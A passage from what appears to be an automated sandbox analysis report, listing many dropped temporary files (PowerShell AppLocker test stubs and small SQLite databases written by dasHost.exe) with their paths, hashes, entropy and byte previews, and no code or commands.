                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5kytjpi.m1o.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrbkn50r.lqd.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsipvwbk.mie.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtpa02zj.4p5.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yojq20ue.vns.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqv4ow2z.fwt.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhqaupfu.fl4.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztputia5.ibj.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\aC8H2RJpHa

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\aFbO6ygK27

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\aO672fXWUj

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\aj6rBt008H

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\b147P5DxwT

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\b73506IkcG

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\bFPblOoIEP

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\bPs4KQTzeq

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\bdWzyU5PwA

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\bwQGjkm5wI

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\c0hfASNhi0

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\caxQXYryr3

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\d2gJy4qPYv

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\d6vTwtJOkQ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\dOIVLYgemb

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\deMm26OjqT

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\djJJxh6VfE

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
